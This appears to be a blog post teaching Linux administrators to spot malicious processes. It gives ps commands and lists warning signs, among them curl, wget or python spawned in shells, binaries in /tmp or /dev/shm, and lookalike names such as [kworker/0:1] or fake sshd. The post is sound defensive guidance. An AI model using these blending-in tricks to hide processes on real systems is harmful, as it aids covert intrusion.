How I Spot a Suspicious Process on My Linux Server (Before It Does Damage)

One strange PID.
One weird name.
That’s all it takes for a compromise to start — silently.

Over the years, I’ve learned to read a process list like a detective. In this blog, I’ll share exactly what I look for when I suspect a Linux server is misbehaving — and how you can spot malicious processes before they take control.

🧠 Step 1: Always Check With ps, Not Just top

Why? Because top refreshes live and can miss fast-spawning processes.

ps aux --sort=-%cpu | head
ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%mem | head

✅ What I look for:

• bash or sh running under unusual users
• Commands like curl, wget, python inside a shell
• Anything running from /tmp or /dev/shm

🧪 Step 2: Look for Process Names That Try to Blend In

Attackers love hiding in plain sight.
They’ll name things like:

• [kworker/0:1]
• sshd (but fake)
• cron (but not started by root)